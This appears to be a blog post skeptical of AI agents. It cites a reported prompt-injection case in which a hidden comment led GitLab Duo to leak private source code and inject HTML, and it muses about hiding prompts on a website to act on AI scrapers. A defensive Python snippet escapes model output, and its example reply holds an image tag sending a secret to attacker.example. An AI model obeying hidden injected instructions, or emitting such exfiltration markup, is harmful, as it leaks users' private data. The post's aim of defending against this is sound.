AI Agents: Loyal Only to the Prompt

Recently I thought: “If AI scrapers are scraping my website, would a prompt injection work? Just adding invisible prompt commands …?”

And just today, a colleague sent me a link to an article about prompt injection in GitLab Duo, “Remote Prompt Injection in GitLab Duo Leads to Source Code Theft”:

TL;DR: A hidden comment was enough to make GitLab Duo leak private source code and inject untrusted HTML into its responses.
https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo

Well, it shows: dammit! Someone else was faster! 😀

But besides that, it confirms a paranoid thought that I have been harboring for quite a while: no output of an AI system should be trusted blindly.
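To make that concrete for the HTML part of the GitLab Duo case, here is a minimal Python sketch, assuming the agent's reply ends up rendered in a web page. The function name `render_untrusted` and the example reply are my own illustrations, not taken from GitLab or the linked article. The idea is simply to treat the model's text like any other user input and escape it before it is displayed.

```python
import html


def render_untrusted(model_output: str) -> str:
    """Escape model output so markup in it is shown as text, not interpreted.

    Hypothetical helper: it assumes the reply is inserted into an HTML page.
    """
    return html.escape(model_output, quote=True)


# Illustrative reply that tries to smuggle an image tag into the page.
reply = 'Done. <img src="https://attacker.example/leak?d=SECRET">'
safe = render_untrusted(reply)
print(safe)
```

Escaping only covers the rendering side. It does nothing against the agent being talked into reading or sending data it shouldn't, so it is one control among several, not a fix.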

It’s undoubtedly a C-level’s wet dream to replace the human workforce with agents and other AI technology. And I admit that I can totally understand it: a couple of robots that you can program and control, that don’t fall sick, and that you can scale up and down through technology. What could go wrong?

The key could be the part “that you can program”. Yes, you can program that agent, but does it do what you told it to? You didn’t train the LLM, and you don’t even know what data it was trained on. If you’re using an AI service, the “brain” is even run by a different company. And we know that LLMs can hallucinate …

What exactly makes us trust such a machine more than a human?

But let’s look at it from a critical angle. Let’s not assume your agents are neutral and acting on your behalf. Let’s briefly treat them as a possible threat. You hired a whole bunch of “people” with a couple of interesting attributes, like:

Under third-party control
No morals or values
Behavior that can change overnight with an update
No loyalty
No sense of responsibility
No memory
No self-reflection
Easily manipulated

Would you hire such employees to manage essential processes and let them write your codebase, all in good conscience, without really tough controls? But controls cost extra time and money and don’t bring immediate value. So let’s face it: there won’t be a lot of controls.

What – could – possibly – go – wrong.
